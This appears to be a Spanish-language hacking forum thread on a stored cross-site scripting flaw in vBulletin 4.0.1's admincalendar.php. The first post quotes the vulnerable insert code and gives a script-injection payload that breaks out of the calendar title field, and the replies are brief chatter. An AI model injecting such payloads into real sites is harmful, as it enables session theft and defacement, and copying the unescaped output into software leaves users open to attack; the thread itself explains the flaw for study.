+ Responder Tema
Resultados 1 al 5 de 5
  1. #1
    Banneado xassiz es una cantidad desconocida en este momento
    Fecha de Ingreso
    19 ene, 09
    Mensajes
    0
    Thanks
    68
    Thanked 121 Times in 77 Posts
    Poder de Reputación
    0

    Predeterminado XSS vBulletin 4.0.1 [admincalendar.php]

    XSS vBulletin 4.0.1

    By: Shell Root



    Dentro del archivo admincalendar.php de la linea 170 a la 192, se realiza una inserción a la base de datos.
    Código:
    		$db->query_write("
    			INSERT INTO " . TABLE_PREFIX . "calendarcustomfield
    			(
    				calendarid,
    				title,
    				options,
    				allowentry,
    				required,
    				length,
    				description
    			)
    			VALUES
    			(" .
    				$vbulletin->GPC['calendarid'] .", '" .
    				$db->escape_string($vbulletin->GPC['title']) . "', '" .
    				$db->escape_string($vbulletin->GPC['options']) . "', " .
    				$vbulletin->GPC['allowentry'] . ", " .
    				$vbulletin->GPC['required'] . ", " .
    				$vbulletin->GPC['length'] . ", '" .
    				$db->escape_string($vbulletin->GPC['description']) . "'
    			)
    		");
    	}
    
    Al mirar detenidamente, se vé la función escape_string y me pregunte y de hecho postee aquí, de que se trataba esa función, ya que no es una función propia del PHP. Me dí a la busqueda de dicha función y se encontraba dentro del archivo includes/class_core.php, desde la linea 717 hasta 727.
    Código:
    	function escape_string($string)
    	{
    		if ($this->functions['escape_string'] == $this->functions['real_escape_string'])
    		{
    			return $this->functions['escape_string']($string, $this->connection_master);
    		}
    		else
    		{
    			return $this->functions['escape_string']($string);
    		}
    	}
    
    Esta función lo que hace es evitar caracteres especiales dentro de una sentencia SQL (Como bien me lo dijo Nakp).

    Ahora que pasa si no ingresamos caracteres especiales para afectar una sentencia SQL sino algo como esto <script>alert(/XSS/)</script>, os dejara pasar y se convertirá en un XSS Persistente!. Miremos...

    Dentro del archivo admincalendar.php, tenemos la oportunidad de modificar un calendario y si miramos el codigo fuente, obtenemos esto: (Solo la parte que os interesa)
    Código:
    <input class="bginput" name="calendar[title]" id="it_calendar[title]_1" value="" size="35" dir="ltr" tabindex="1" type="text">
    
    Podemos realizar esto para bypassear el input:
    Código:
    "><script>alert(/XSS/)</script>
    
    A lo que al llamarlo quedará así, provocando un XSS Persistente:
    Código:
    <input class="bginput" name="calendar[title]" id="it_calendar[title]_1" value=""><script>alert(/XSS/)</script>" size="35" dir="ltr" tabindex="1" type="text">
    
    NOTA: La Inserción del XSS dentro del archivo, es solo por un usuario Administrador


    Fuente:elhacker.net
    Citar Citar   Share with Facebook

  2. The Following User Says Thank You to xassiz For This Useful Post:

    jeann (06/03/2010)

  3. #2
    Banneado .:WindHack:. es un faro de luz gloriosa .:WindHack:. es un faro de luz gloriosa .:WindHack:. es un faro de luz gloriosa .:WindHack:. es un faro de luz gloriosa .:WindHack:. es un faro de luz gloriosa .:WindHack:. es un faro de luz gloriosa
    Fecha de Ingreso
    22 mar, 09
    Mensajes
    0
    Thanks
    202
    Thanked 543 Times in 307 Posts
    Poder de Reputación
    0

    Predeterminado Re: XSS vBulletin 4.0.1 [admincalendar.php]

    NOTA: La Inserción del XSS dentro del archivo, es solo por un usuario Administrador


    Se agradece.
    Citar Citar   Share with Facebook

  4. #3
    Programmer's Team Coordi Ponchale es una joya en bruto Ponchale es una joya en bruto Ponchale es una joya en bruto Avatar de Ponchale
    Fecha de Ingreso
    13 jun, 08
    Ubicación
    68.178.254.179
    Edad
    18
    Mensajes
    4,897
    Nacionalidad
    Colombia!
    Thanks
    207
    Thanked 649 Times in 345 Posts
    Poder de Reputación
    567

    Predeterminado Re: XSS vBulletin 4.0.1 [admincalendar.php]

    es un poco viejo o yo conozco otro pero esta bueno



    Visitanos te esperamos

    [Solo usuarios registrados pueden ver los links. ]
    Citar Citar   Share with Facebook

  5. #4
    Usuario jeann es una cantidad desconocida en este momento Avatar de jeann
    Fecha de Ingreso
    20 ago, 08
    Ubicación
    Venezuela
    Edad
    33
    Mensajes
    28
    Nacionalidad
    Venezuela!
    Thanks
    396
    Thanked 199 Times in 153 Posts
    Poder de Reputación
    0

    Predeterminado Re: XSS vBulletin 4.0.1 [admincalendar.php]

    Cita Iniciado por xassiz Ver Mensaje

    NOTA: La Inserción del XSS dentro del archivo, es solo por un usuario Administrador
    Entonces solo lo puede reventar ek_col,jajajajajajaj
    Entusiasta del Mundo Libre GNU!!
    Mi Pagina: [Solo usuarios registrados pueden ver los links. ]
    [Solo usuarios registrados pueden ver los links. ]
    [Solo usuarios registrados pueden ver los links. ]
    [Solo usuarios registrados pueden ver los links. ]
    Citar Citar   Share with Facebook

  6. #5
    Programmer's Team Coordi Ponchale es una joya en bruto Ponchale es una joya en bruto Ponchale es una joya en bruto Avatar de Ponchale
    Fecha de Ingreso
    13 jun, 08
    Ubicación
    68.178.254.179
    Edad
    18
    Mensajes
    4,897
    Nacionalidad
    Colombia!
    Thanks
    207
    Thanked 649 Times in 345 Posts
    Poder de Reputación
    567

    Predeterminado Re: XSS vBulletin 4.0.1 [admincalendar.php]

    este fallo no nos hace nada ya que nosotros somos 4.0.2



    Visitanos te esperamos

    [Solo usuarios registrados pueden ver los links. ]
    Citar Citar   Share with Facebook

Temas Similares

  1. Vbulletin 4.0.2 XSS Vulnerability
    Por Kaiser en el foro Nivel Web
    Respuestas: 3
    Último Mensaje: 31/03/2010, 14:17
  2. vbulletin 3.8.2 DDOS
    Por Ponchale en el foro Nivel Web
    Respuestas: 2
    Último Mensaje: 31/03/2010, 11:49
  3. VBulletin DoS Exploit
    Por jeann en el foro Biblioteca de Bugs & Exploits
    Respuestas: 0
    Último Mensaje: 30/01/2010, 23:02
  4. vBulletin Nightmare v.1
    Por xassiz en el foro Nivel Web
    Respuestas: 0
    Último Mensaje: 14/07/2009, 16:42

Permisos de Publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
 

Familia LH:
 Foro de Programacion - GeekHispano | Foro de Conversacion - TeVeo

Afiliados:
LeVeL-23 | Comunidad Underground de Mexico | Skamasle - De Todo un Poco | Foro Arte Libre | SSW Team | El Blog del Dr. White
Comunidad RAW | Polaxia Warez | [BACK DOOR] | Portal Hacker |
TECNOHACKER | Rthacker.net | Estegano | Artehack
 

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75